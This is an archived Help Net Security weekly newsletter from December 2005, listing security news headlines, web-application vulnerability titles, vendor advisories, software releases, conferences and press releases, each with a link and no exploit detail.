HNS Newsletter Issue This

Document Sample
HNS Newsletter Issue This Powered By Docstoc
					HNS Newsletter
Issue 296 - 19.12.2005.
http://net-security.org

This is a newsletter delivered to you by Help Net Security. It
covers weekly roundups of security events that were in the
news the past week.

----------------------------------------------------------------
"How A Hacker Launches A Blind SQL Injection Attack Step-by-Step" WP
----------------------------------------------------------------
The newest web app vulnerability... Blind SQL Injection!
Even if your web application does not return error messages, it may
still be open to a Blind SQL Injection Attack. Blind SQL Injection can
deliver total control of your server to a hacker giving them the ability
to read, write and manipulate all data stored in your backend systems!
Download this *FREE* white paper from SPI Dynamics for a complete guide
to protection!
----------------------------------------------------------------
Download whitepaper from: http://www.net-security.org/v/spidyn2
----------------------------------------------------------------

Table of contents:

1) Security news
2) Vulnerabilities
3) Advisories
4) Articles
5) Software
6) Conferences
7) Security World
8) Virus News


[ Security news ]


----------------------------------------------------------------

MOBILITY DONE RIGHT - WITHOUT THE RISK
Mobility is having a profound impact on productivity within
organizations today. In a recent study, workers were found to be
13.4% more productive when using wireless devices.
http://www.net-security.org/news.php?id=9703


ZERO DAY EXCEL HACKER TAKES ON EBAY
But vulnerability author says he is still talking with Microsoft.
http://www.net-security.org/news.php?id=9704


ONLINE ANTI-PIRACY SERVICE CLOSES
A company that fought net piracy by adding fake files to file-sharing
networks is being closed down.
http://www.net-security.org/news.php?id=9705


SMALL SECURITY BUG IN FIREFOX, USERS UNSCATHED
History repeating.
http://www.net-security.org/news.php?id=9706
TWO-FACTOR CHECKS GIVE PCS EXTRA SECURITY LAYER
Pointsec Mobile Technologies will today release a new version of its
security tool for PCs.
http://www.net-security.org/news.php?id=9707


MICROSOFT TIGHTENING SECURITY DEFAULTS IN IE 7
Microsoft details changes aimed at reducing users' chances of falling
victim to malicious code.
http://www.net-security.org/news.php?id=9708


IT SECURITY LEADERS SET FOR KEY ROLES
IT security managers had better get ready to ditch their peripheral,
advisory role and get used to being the organisation’s key digital
security player.
http://www.net-security.org/news.php?id=9709


THE FIREFOX HACKS YOU MUST HAVE
With the release of the new version 1.5 of Firefox, there's never
been a better time to download the open-source browser, take it for a
drive, kick the tires and see what it can do.
http://www.net-security.org/news.php?id=9710


A FOOL'S CHOICE: FEATURES OR SECURITY IN WEB APPLICATIONS
Web applications that give customers, employees, and business
partners access to services and information are difficult to secure
and increasingly a soft target for hackers, who use a variety of
techniques to probe for sensitive data.
http://www.net-security.org/news.php?id=9711


PORT SCANS DON'T ALWAYS PRECEDE NETWORK HACKS
University of Maryland study finds most attacks are made without
them.
http://www.net-security.org/news.php?id=9712


SECURING SQL SERVERS USING GROUP POLICY
By implementing company policies and enforcing them through Active
Directory and Group Policy, you can literally affect thousands of
installations at once and enforce order from chaos.
http://www.net-security.org/news.php?id=9713


CYBERTHIEVES EXPLOIT CHRISTMAS SHIPPING DEADLINE
E-tailers have circled Tueday on their calendars — and so have
cyberthieves.
http://www.net-security.org/news.php?id=9714


SECURITY BREACH AT SAM'S CLUB EXPOSES CREDIT CARD DATA
An unspecified number of consumers have been affected by the breach.
http://www.net-security.org/news.php?id=9715
SECURITY ASSESSMENT: HOW TO CRACK PASSWORDS
One of the key components in performing a security assessment is the
acquisition of user account information and cracking of the account
password. We show you the some of the tools use to crack these
passwords.
http://www.net-security.org/news.php?id=9716


HACKER ATTACKS IN US LINKED TO CHINESE MILITARY
A systematic effort by hackers to penetrate US government and
industry computer networks stems most likely from the Chinese
military, the head of a leading security institute said.
http://www.net-security.org/news.php?id=9717


STORY OF A DUMB PATCH
This paper is an advisory but mostly it describes a mistake made by
Microsoft on patch MS05-018 where Microsoft failed to properly fix a
vulnerability having to release a new patch MS05-049.
http://www.net-security.org/news.php?id=9718


CISCO LAUNCHES PRACTICE LAB FOR CCIE
Cisco Systems today announced the launch of the CCIE (Cisco Certified
Internetwork Expert) Assessor Lab for Routing and Switching, the first
online CCIE practice lab exam offered by Cisco’s certification
program.
http://www.net-security.org/news.php?id=9719


SANS LOOKS TO SECURITY BY DEGREES
The SANS Institute has decided to go back to school.
http://www.net-security.org/news.php?id=9720


NEW ATTACK TARGETS KNOWN MOZILLA BUG
The exploit takes advantage of a known bug in the way that Firefox
processes Javascript.
http://www.net-security.org/news.php?id=9721


CONSORTIUM TAKES ON SECURITY ISSUES
Chief information security officers can have a difficult time
fighting for budget dollars, because detailing the business ROI of
buying a security product is far different from buying a Web portal.
http://www.net-security.org/news.php?id=9722


IDENTITY THEFT FEARS: UNDERREPORTED OR OVERBLOWN?
For every new incident of identity theft, data loss, or online fraud,
it seems as if a study has been commissioned to verify if this is a
first-class threat or an exaggerated nuisance.
http://www.net-security.org/news.php?id=9723


E-MAIL SPILLS CORPORATE SECRETS
Six percent of workers admitted that they've E-mailed confidential
company information to someone they shouldn't have.
http://www.net-security.org/news.php?id=9724
MOST STOLEN IDENTITIES NEVER USED
A new study suggests consumers whose credit cards are lost or stolen
or whose personal information is accidentally compromised face little
risk of becoming victims of identity theft.
http://www.net-security.org/news.php?id=9725


FIRMS COUNT THE COST OF SECURITY THREATS
Security threats soared during 2005, along with the risk of financial
losses, but a new report shows that companies still aren't heeding the
warnings.
http://www.net-security.org/news.php?id=9726


HACKERS BREAK INTO CHARITY WEBSITE
Charity Commission issues stark warning of increase in online fraud.
http://www.net-security.org/news.php?id=9727


DON'T OVERLOOK INTERNAL E-MAIL MONITORING
Keeping an eye on your people's E-mail can head off security and
compliance violations. Here's three ways you can make a difference
now.
http://www.net-security.org/news.php?id=9728


MICROSOFT PATCH TUESDAY BRINGS TWO BULLETINS
This month's Bulletins include security updates affecting Microsoft
Windows and Microsoft Internet Explorer.
http://www.net-security.org/news.php?id=9729


SECURITY ENHANCEMENTS IN OUTLOOK WEB ACCESS 2003
Outlook Web Access 2003 (OWA) is the web client delivered with
Microsoft Exchange Server 2003. As well as new end user functionality
features OWA 2003 delivers many enhancements that address common
security concerns.
http://www.net-security.org/news.php?id=9730


RESEARCHERS CRACK BIOMETRIC SECURITY WITH PLAY-DOH
"We have been saying for a long time that fingerprint readers can be
compromised by someone lifting live prints and creating false
fingers," said Avivah Litan, a Gartner analyst specializing in
security technologies.
http://www.net-security.org/news.php?id=9731


SYMANTEC LAUNCHES SECURITY APPLIANCES
The Gateway Security 5600's top-of-the-line model features throughput
of 3 Gbps and includes connectivity options for fiber and copper
Ethernet uplinks.
http://www.net-security.org/news.php?id=9732


MOBILE DATA SECURITY BOOSTED BY SELF-DESTRUCT TEXTS
A service offering secure self-destruct mobile text messages has been
launched in the UK.
http://www.net-security.org/news.php?id=9733
CREATING SECURE WIRELESS ACCESS POINTS WITH OPENBSD AND OPENVPN
You know how insecure 802.11x wireless networks are. In this article
we'll create an OpenBSD-based secure wireless access point that
prevents unauthorized access and encrypts every packet using a VPN
tunnel.
http://www.net-security.org/news.php?id=9734


ID FRAUDSTERS TARGET JOB CENTRE STAFF
Tax credit portal scam may hit 13,000.
http://www.net-security.org/news.php?id=9735


VMWARE'S SECURE BROWSER APPLIANCE
Threats like rootkits, spyware, adware, and viruses are simply cut
off.
http://www.net-security.org/news.php?id=9736


SECURITY A MONEY-MOTIVATED CONCERN IN 2005
Hackers working for cash emerged, employing quieter, more precise
techniques.
http://www.net-security.org/news.php?id=9737


SECURITY CHIEFS SHARE PAINS OF BEING CAUGHT IN THE MIDDLE
Corporate security experts face a crisis as they are caught between
regulators demanding better accountability for data security and the
need to keep businesses up and running with the help of many business
partners, an American Express security executive told Interop New York
attendees Tuesday.
http://www.net-security.org/news.php?id=9738


WHAT'S NEW IN MODSECURITY
This article describes the most important new features in ModSecurity
1.9.
http://www.net-security.org/news.php?id=9739


INTERNET SECURITY GONE WILD
"The real problem is the unspoken and unholy alliance between
Microsoft and other vendors not to stomp too hard on cookies so as
not to interfere with their customers," said Andrew Jaquith, senior
analyst at the Yankee Group.
http://www.net-security.org/news.php?id=9740


CONFESSIONS OF AN HONEST CRACKER
CyberMage cracks every game he plays. He also pays for every game he
cracks. Following his lead could spare honest people a lot of
aggravation, he says.
http://www.net-security.org/news.php?id=9741


DECLARATION OF RIGHTS FOR ADMINISTRATORS AND END USERS
Frustrated with having to deal with unwanted software being installed
on her network, an administrator suggests something be done about it.
http://www.net-security.org/news.php?id=9742


EMBEDDED SECURITY
This paper examines the benefits that TPM chips bring to
security-conscious businesses, and the ways in which this technology
can elevate trusted computing to higher levels, enhancing security
while simplifying usability.
http://www.net-security.org/news.php?id=9743


PRIVACY: THE DEVIL'S PLAYGROUND
The European Parliament adopted new rules drawn up by the European
Union to store phone and internet data for up to two years to fight
terrorism and other serious crime.
http://www.net-security.org/news.php?id=9744


BROWSER USERS URGED TO PATCH UP
Windows users are being warned about a bug that lets attackers take
over a PC via the Internet Explorer browser.
http://www.net-security.org/news.php?id=9745


SOBER WORM CRACKED
Finnish security firm says it has the solution.
http://www.net-security.org/news.php?id=9746


2005: A YEAR OF SECURITY WOES AND ACQUISITIONS
Computing rounds up the major events of the past year that have
shaped the IT industry in the UK, such as growing budgets and
government IT projects.
http://www.net-security.org/news.php?id=9747


UK SHOPKEEPERS BEATING ONLINE FRAUD
UK retailers are beating the problem of online fraud, according to a
new survey.
http://www.net-security.org/news.php?id=9748


WEB SERVICE SECURITY
This guide provides a scenario-driven approach to demonstrate where
different security patterns are successful, combined with a series of
decision matrices to assist you in applying your own criteria for
using Web service security patterns in your environment.
http://www.net-security.org/news.php?id=9749


SOFTWARE 'PIRATE' PLEADS GUILTY TO CHARGES
California man faces maximum sentence of 10 years in prison and
$500,000 fine.
http://www.net-security.org/news.php?id=9750


ADOBE MOVING TO MONTHLY SECURITY PATCH SCHEDULE
Customers have asked for a more predictable schedule.
http://www.net-security.org/news.php?id=9751
"DARK TRAFFIC" ZAPS 83 PERCENT OF E-MAIL RESOURCES
The amount of valid e-mail as a percentage of all incoming traffic
has declined sharply since the beginning of the year, a messaging
security vendor reported Tuesday, due to a tripling of directory
harvest attacks by spammers after addresses.
http://www.net-security.org/news.php?id=9752


MAC WORKSTATION SECURITY: MORE WAYS TO CLAMP DOWN ON THREATS
This article offers a look at additional ways to tighten security on
workstations, from disabling peer-to-peer sharing to limiting SSH
access and securing local NetInfo data.
http://www.net-security.org/news.php?id=9753


ATTACK OF THE 'ZOMBIES' (AND HOW TO RESPOND)
This webcast reviews next-generation bot features and
security-evasion techniques, and explores practical ways for
identifying them given their new level of sophistication.
http://www.net-security.org/news.php?id=9754


SECURITY STATUS RISES
New research from The International Information Security
Certification Consortium (ISC2) shows that IT security professionals
are boosting their profile in the boardroom.
http://www.net-security.org/news.php?id=9755


TOTALLY SECURE CLASSICAL COMMUNICATIONS?
How would you feel if you invested millions of dollars in quantum
cryptography, and then learned that you could do the same thing with
a few 25-cent Radio Shack components?
http://www.net-security.org/news.php?id=9756


ITEM-LEVEL RFID TAGGING AIMS TO CURTAIL COUNTERFEITING
Vue Technology and Symbol Technologies Inc. on Wednesday said they
will jointly develop and offer an item-level radio frequency
identification (RFID) software and hardware package for retailers and
manufacturers.
http://www.net-security.org/news.php?id=9757


DUTCH HACKING GROUP CRACKS XBOX 360
Team PI Coder claims to have penetrated new console's security
systems.
http://www.net-security.org/news.php?id=9758


SURVIVOR'S GUIDE TO 2006: SECURITY
As you prepare for 2006, you need compliance-driven products to
ensure your company doesn't become the next security-breach headline.
But don't be fooled by all the vendor hype.
http://www.net-security.org/news.php?id=9759


WINDOWS XP GETS SECURITY CERTIFICATION
Touting the success of it's new Security Development Lifecycle (SDL)
process, Microsoft late Wednesday said Windows Server 2003 and
Windows XP SP2 Professional and Embedded have secured the highest
Common Criteria security certification from the United States
government's National Information Assurance Partnership.
http://www.net-security.org/news.php?id=9760


MOBILE DEVICES USERS NEED STRONGER SECURITY
Encryption is becoming increasingly important, according to a panel
at this week's Interop trade show.
http://www.net-security.org/news.php?id=9761


TIME TO COME CLEAN ABOUT HACKING
Companies need to pool information about web-based attacks to keep
online buyers safe and spending.
http://www.net-security.org/news.php?id=9762


THE ENEMY WITHIN
Geeks, squatters and saboteurs threaten corporate security.
http://www.net-security.org/news.php?id=9763


WEB, SECURITY, WIRELESS TECHNOLOGIES RIVET CIOS
A newly released survey of CIOs confirmed that Web issues and
security, followed by wireless technologies, have held on to their
positions as the leading technologies that concern federal IT
professionals.
http://www.net-security.org/news.php?id=9764


NEW MALWARE TARGETS MICROSOFT USERS
Two variants of the exploit are now in circulation.
http://www.net-security.org/news.php?id=9765


HONEYPOTS AS AN EARLY WARNING SYSTEM
These sticky traps make a good backup plan for malware detection -
and every enterprise should have at least one.
http://www.net-security.org/news.php?id=9766


P-TO-P VIDEO AND MUSIC DOWNLOAD SECURITY THREAT
A series of files are being circulated across the Internet at
peer-to-peer networks that allegedly contain music and videos, but
also include adware in the form of a "toolbar," a security vendor
says.
http://www.net-security.org/news.php?id=9767

----------------------------------------------------------------




[ Vulnerabilities ]


All vulnerabilities are located here:
http://www.net-security.org/vulnerabilities.php
----------------------------------------------------------------

PHP Support Tickets index.php Multiple Field SQL Injection
http://www.net-security.org/vulnerability.php?id=21730


Zaygo Multiple Cart zaygo.cgi root Variable XSS
http://www.net-security.org/vulnerability.php?id=21729


PDEstore pdestore.cgi Multiple Variable XSS
http://www.net-security.org/vulnerability.php?id=21727


Ad Manager Pro advertiser_statistic.php ad_number Variable SQL
Injection
http://www.net-security.org/vulnerability.php?id=21709


Plogger index.php id Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21710


Plogger index.php Multiple Variable XSS
http://www.net-security.org/vulnerability.php?id=21711


PlexCart X3 Product Search Module SQL Injection
http://www.net-security.org/vulnerability.php?id=21712


WHMCompleteSolution knowledgebase.php search Variable XSS
http://www.net-security.org/vulnerability.php?id=21697


phpCOIN db.php _CCFG[_PKG_PATH_DBSE] Remote File Inclusion
http://www.net-security.org/vulnerability.php?id=21724


phpCOIN Cookie Data SQL Injection
http://www.net-security.org/vulnerability.php?id=21725


phpCOIN config.php Direct Request Path Disclosure
http://www.net-security.org/vulnerability.php?id=21726


VCD-db search.php by Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21699


VCD-db Search Module batch Variable XSS
http://www.net-security.org/vulnerability.php?id=21700


mcGalleryPRO index.php language Variable Local File Inclusion
http://www.net-security.org/vulnerability.php?id=21718
mcGalleryPRO show.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21719


mcGalleryPRO index.php album Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21720


mcGalleryPRO Search Module XSS
http://www.net-security.org/vulnerability.php?id=21721


Snipe Gallery view.php gallery_id Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21693


Snipe Gallery image.php image_id Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21694


Snipe Gallery search.php keyword Variable XSS
http://www.net-security.org/vulnerability.php?id=21695


PhpWebGallery comments.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21689


PhpWebGallery category.php search Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21690


PhpWebGallery picture.php image_id Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21691


Dream Poll view_Results.php id Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21688


Jamit Job Board index.php cat Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21687


MySQL Auction Search Module keyword XSS
http://www.net-security.org/vulnerability.php?id=21685


QuickPayPro popups.edit.php popupid Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21676


QuickPayPro customer.tickets.view.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21677


QuickPayPro subscribers.tracking.edit.php subtrackingid Variable SQL
Injection
http://www.net-security.org/vulnerability.php?id=21678
QuickPayPro design.php delete Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21679


QuickPayPro tracking.details.php trackingid Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21680


QuickPayPro sales.view.php customerid Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21681


QuickPayPro subscribers.tracking.add.php Multiple Variable XSS
http://www.net-security.org/vulnerability.php?id=21682


QuickPayPro tickets.add.php Multiple Variable XSS
http://www.net-security.org/vulnerability.php?id=21683


QuickPayPro categories.php Multiple Variable XSS
http://www.net-security.org/vulnerability.php?id=21684


Utopia News Pro editnews.php newsid Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21645


Utopia News Pro faq.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21646


Utopia News Pro postnews.php poster Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21647


Utopia News Pro templates.php tempid Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21648


Utopia News Pro users.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21649


phpWebThings download.php ref Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21650


phpWebThings forum.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21651


phpWebThings forum_edit.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21652


phpWebThings forum_write.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21653
phpWebThings guestbook.php tekst Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21654


phpWebThings index.php menuoption Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21655


phpWebThings myaccount.php sel_avatar Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21656


e107 signup.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21657


e107 subcontent.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21658


e107 upload.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21659


e107 usersettings.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21660


myBloggie add.php category Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21661


myBloggie addcat.php cat_desc Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21662


myBloggie adduser.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21663


myBloggie del.php post_id Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21664


myBloggie delcat.php cat_id Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21665


myBloggie delcomment.php comment_id Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21666


myBloggie deluser.php id Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21667


myBloggie edit.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21668
myBloggie editcat.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21669


myBloggie edituser.php Multiple Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21670


EveryAuction auction.pl searchstring Variable XSS
http://www.net-security.org/vulnerability.php?id=21674


Arab Portal link.php PHPSESSID Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21672


ASP-DEv XM Forum forum.asp forum_id Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21706


ASP-DEv XM Forum register.asp SQL Injection
http://www.net-security.org/vulnerability.php?id=21707


ASP-DEv XM Forum search.asp Search For SQL Injection
http://www.net-security.org/vulnerability.php?id=21708


Opera Bookmarked Page Title Overflow DoS
http://www.net-security.org/vulnerability.php?id=21641


Horde Kronolith Calendar Multiple Field XSS
http://www.net-security.org/vulnerability.php?id=21608


Horde Kronolith Calendar Event Manipulation XSS
http://www.net-security.org/vulnerability.php?id=21609


Horde Kronolith Calendar Search Function Multiple Method XSS
http://www.net-security.org/vulnerability.php?id=21610


Horde Kronolith Calendar Edit Permission Function XSS
http://www.net-security.org/vulnerability.php?id=21611


Scout Portal Toolkit SPT--Home.php ResourceOffset Variable SQL
Injection
http://www.net-security.org/vulnerability.php?id=21625


Scout Portal Toolkit SPT--UserLogin.php Multiple Variable SQL
Injection
http://www.net-security.org/vulnerability.php?id=21626
Scout Portal Toolkit SPT--BrowseResources.php ParentId Variable SQL
Injection
http://www.net-security.org/vulnerability.php?id=21627


Scout Portal Toolkit SPT--FullRecord.php ResourceId Variable SQL
Injection
http://www.net-security.org/vulnerability.php?id=21628


Scout Portal Toolkit SPT--BrowseResources.php ParentId Variable XSS
http://www.net-security.org/vulnerability.php?id=21630


Scout Portal Toolkit SPT--Advanced.php Multiple Field XSS
http://www.net-security.org/vulnerability.php?id=21631


Scout Portal Toolkit SPT--FullRecord.php ResourceId Variable XSS
http://www.net-security.org/vulnerability.php?id=21632


Scout Portal Toolkit SPT--Home.php ResourceOffset Variable XSS
http://www.net-security.org/vulnerability.php?id=21633


Scout Portal Toolkit SPT--UserLogin.php Multiple Variable XSS
http://www.net-security.org/vulnerability.php?id=21634


Scout Portal Toolkit SPT--AdvancedSearch.php Multiple Variable XSS
http://www.net-security.org/vulnerability.php?id=21635


Scout Portal Toolkit SPT--QuickSearch.php Multiple Variable XSS
http://www.net-security.org/vulnerability.php?id=21636


Netref index.php cat Variable SQL Injection
http://www.net-security.org/vulnerability.php?id=21623


MyBulletinBoard (MyBB) Unspecified SQL Injection
http://www.net-security.org/vulnerability.php?id=21600


MyBulletinBoard (MyBB) Unspecified Issue
http://www.net-security.org/vulnerability.php?id=21601

----------------------------------------------------------------




[ Advisories ]


All advisories are located at:
http://www.net-security.org/archive_advi.php
----------------------------------------------------------------

SCO Security Advisory - OpenServer 6.0.0 : Tcpdump Denial of Service
(SCOSA-2005.61)
http://www.net-security.org/advisory.php?id=5720


SCO Security Advisory - UnixWare 7.1.3 UnixWare 7.1.4 : Tcpdump
Denial of Service (SCOSA-2005.60)
http://www.net-security.org/advisory.php?id=5719


SCO Security Advisory - OpenServer 5.0.7 OpenServer 6.0.0 : Gzip
Multiple Vulnerabilities (SCOSA-2005.59)
http://www.net-security.org/advisory.php?id=5718


SCO Security Advisory - UnixWare 7.1.4 : Gzip Multiple
Vulnerabilities (SCOSA-2005.58)
http://www.net-security.org/advisory.php?id=5717


SUSE Security Announcement - SUSE Security Summary Report
(SUSE-SR:2005:030)
http://www.net-security.org/advisory.php?id=5716


Microsoft Security Bulletin - Summary for December 2005
http://www.net-security.org/advisory.php?id=5715


Mandriva Linux Security Update Advisory - ffmpeg (MDKSA-2005:231)
http://www.net-security.org/advisory.php?id=5714


Mandriva Linux Security Update Advisory - mplayer (MDKSA-2005:230)
http://www.net-security.org/advisory.php?id=5713


Mandriva Linux Security Update Advisory - gstreamer-ffmpeg
(MDKSA-2005:232)
http://www.net-security.org/advisory.php?id=5712


Mandriva Linux Security Update Advisory - xmovie (MDKSA-2005:229)
http://www.net-security.org/advisory.php?id=5711


Mandriva Linux Security Update Advisory - xine-lib (MDKSA-2005:228)
http://www.net-security.org/advisory.php?id=5710


SCO Security Advisory - UnixWare 7.1.3 UnixWare 7.1.4 : LibXpm
Integer Overflow Vulnerability (SCOSA-2005.57)
http://www.net-security.org/advisory.php?id=5709


SCO Security Advisory - UnixWare 7.1.3 UnixWare 7.1.4 : Xloadimage
NIFF Image Title Handling Buffer Overflow Vulnerability
(SCOSA-2005.56)
http://www.net-security.org/advisory.php?id=5708


SCO Security Advisory - UnixWare 7.1.3 UnixWare 7.1.4 : Xloadimage
NIFF Image Title Handling Buffer Overflow Vulnerability
(SCOSA-2005.56)
http://www.net-security.org/advisory.php?id=5707


SCO Security Advisory - UnixWare 7.1.3 UnixWare 7.1.4 : Lynx Command
Injection Vulnerability (SCOSA-2005.55)
http://www.net-security.org/advisory.php?id=5706


Mandriva Linux Security Update Advisory - ethereal ( MDKSA-2005:227)
http://www.net-security.org/advisory.php?id=5705


Debian Security Advisory - kernel-source-2.4.27 (DSA 922-1)
http://www.net-security.org/advisory.php?id=5704


OpenPKG Security Advisory - apache2 vulnerability
(OpenPKG-SA-2005.029)
http://www.net-security.org/advisory.php?id=5703


Debian Security Advisory - kernel-source-2.4.27 (DSA 921-1)
http://www.net-security.org/advisory.php?id=5702


SUSE Security Announcement - php4,php5 (SUSE-SA:2005:069)
http://www.net-security.org/advisory.php?id=5701


SUSE Security Announcement - kernel, perl (SUSE-SA:2005:068)
http://www.net-security.org/advisory.php?id=5700


US-CERT Technical Cyber Security Alert - Microsoft Internet Explorer
Vulnerabilities (TA05-347A)
http://www.net-security.org/advisory.php?id=5699


Ubuntu Security Notice - zope2.8 vulnerability (USN-229-1)
http://www.net-security.org/advisory.php?id=5698


Debian Security Advisory - ethereal (DSA 920-1)
http://www.net-security.org/advisory.php?id=5697


Mandriva Linux Security Update Advisory - mozilla-thunderbird
(MDKSA-2005:226)
http://www.net-security.org/advisory.php?id=5696


Ubuntu Security Notice - curl vulnerability (USN-228-1)
http://www.net-security.org/advisory.php?id=5695
SCO Security Advisory - UnixWare 7.1.3 UnixWare 7.1.4 : uidadmin
Buffer Overflow Vulnerability (SCOSA-2005.54)
http://www.net-security.org/advisory.php?id=5694


SCO Security Advisory - UnixWare 7.1.3 UnixWare 7.1.4 : OpenSSH
Multiple Vulnerabilities (SCOSA-2005.53)
http://www.net-security.org/advisory.php?id=5693


Ubuntu Security Notice - perl vulnerability (USN-222-2)
http://www.net-security.org/advisory.php?id=5692


Ubuntu Security Notice - xpdf/cupsys/tetex-bin/kdegraphics/koffice
vulnerabilities (USN-227-1)
http://www.net-security.org/advisory.php?id=5691


Debian Security Advisory - curl (DSA 919-1)
http://www.net-security.org/advisory.php?id=5690

----------------------------------------------------------------




[ Articles ]


All articles are located at:
http://www.net-security.org/articles_main.php

Articles can be contributed to articles@net-security.org


----------------------------------------------------------------

DECLARATION OF RIGHTS FOR ADMINISTRATORS AND END USERS
Frustrated with having to deal with unwanted software being installed
on her network, an administrator suggests something be done about it.
http://www.net-security.org/article.php?id=881


MICROSOFT PATCH TUESDAY BRINGS TWO BULLETINS
December's update is not much different than last month's update
since Microsoft released two bulletins.
http://www.net-security.org/article.php?id=880

----------------------------------------------------------------




[ Software ]


Windows software is located at:
http://net-security.org/software_main.php?cat=1

Linux software is located at:
http://net-security.org/software_main.php?cat=2

Pocket PC software is located at:
http://net-security.org/software_main.php?cat=3

Mac OS X software is located at:
http://net-security.org/software_main.php?cat=5


----------------------------------------------------------------

GPGEE 1.2.3 (Windows)
GPGee is a shell extension for Windows explorer that acts as an
assistant for using GNU Privacy Guard (GnuPG/GPG).
http://www.net-security.org/software.php?id=642


IKNOW PROCESS SCANNER 1.0.1 (Windows)
Tool for getting information on running processes in your Windows
machine.
http://www.net-security.org/software.php?id=644


IRC DEFENDER 1.4b1 (Linux)
IRC Defender is a Perl program for protecting your IRC network
against virus drones, general troublemakers, ban evasion, and
attacks.
http://www.net-security.org/software.php?id=219


KMYFIREWALL 1.0 (Linux)
KMyFirewall is a Kde/Qt Programm that tries to provide an easy to use
and comfortable GUI for the Linux 2.4 "iptables" command.
http://www.net-security.org/software.php?id=137


LINUX-VSERVER 2.01 (Linux)
A system for running general purpose virtual servers on one box at
full speed.
http://www.net-security.org/software.php?id=527


MARADNS 1.1.91 (Linux)
MaraDNS is a DNS server that strives to be secure and fully
open-sourced.
http://www.net-security.org/software.php?id=84


SECURESERV 3.0 Alpha 3 (Linux)
SecureServ is a advanced IRC trojan detector, much like a virus
scanner, but aimed for IRC networks.
http://www.net-security.org/software.php?id=492


SHOREWALL 3.0.3 (Linux)
Shorewall is an iptables based firewall that can be used on a
dedicated firewall system, a multi-function masquerade gateway/server
or on a standalone Linux system.
http://www.net-security.org/software.php?id=40


STRONGSWAN 2.5.7 (Linux)
strongSwan is a complete IPsec and IKEv1 implementation for Linux 2.4
and 2.6 kernels
http://www.net-security.org/software.php?id=643

----------------------------------------------------------------




[ Conferences ]


All conferences are located at:
http://net-security.org/conferences.php


----------------------------------------------------------------

Black Hat Federal 2006 Briefings and Training
Organized by Black Hat - 23 January-26 January 2006
http://www.net-security.org/conference.php?id=150


RSA Conference 2006
Organized by RSA Security - 13 February-17 February 2006
http://www.net-security.org/conference.php?id=142


Black Hat Europe 2006 Briefings and Training
Organized by Black Hat - 28 February-3 March 2006
http://www.net-security.org/conference.php?id=151


LayerOne 200
Organized by LayerOne - 22 April-23 April 2006
http://www.net-security.org/conference.php?id=154


iTrust 2006
Organized by IIT-CNR - 16 May-19 May 2006
http://www.net-security.org/conference.php?id=152


Eurocrypt 2006
Organized by IACR - 28 May-1 June 2006
http://www.net-security.org/conference.php?id=153

----------------------------------------------------------------




[ Security World ]
All press releases are located at:
http://www.net-security.org/press_main.php

Send your press releases to press@net-security.org


----------------------------------------------------------------

atsec information security Consultant Receives KPMG Information
Security Management Systems 2005 Award
http://www.net-security.org/press.php?id=3712


Cyberoam Unified Threat Management Appliance Eliminates Anonymity
from Internal Threats
http://www.net-security.org/press.php?id=3711


PlanetMagpie Partners With Sonasoft
http://www.net-security.org/press.php?id=3710


Utimaco's SafeGuard PDA adds advanced security for Palm OS users
http://www.net-security.org/press.php?id=3709


Be vigilant against Dasher warns Internet Security Systems
http://www.net-security.org/press.php?id=3708


Dasher-B Worm Exploits Microsoft Security Vulnerability On Windows
2000 Pcs, Sophos Reports
http://www.net-security.org/press.php?id=3707


PC Magazine Awards 'best Of The Year' To Astaro Security Gateway 220
http://www.net-security.org/press.php?id=3706


D-Link Unveils New Business Security Solutions
http://www.net-security.org/press.php?id=3705


Internet Security Systems Pre-emptively Protects Customers Against
Critical Flaw in Microsoft Internet Explorer
http://www.net-security.org/press.php?id=3704


Skybox Security Launches Industry’s First Integrated Suite For
Security Risk Management With Skybox View 2.5
http://www.net-security.org/press.php?id=3703


Safety Tips For Last-Minute Online Christmas Shoppers As Cybercrime
Runs Rampant
http://www.net-security.org/press.php?id=3702


Tips on How to Beat Online Fraudsters by Security Expert
http://www.net-security.org/press.php?id=3701
MDI, Inc. to Acquire Advanced Security Link
http://www.net-security.org/press.php?id=3700


Internet Security Systems Introduces Virus Prevention Technology in
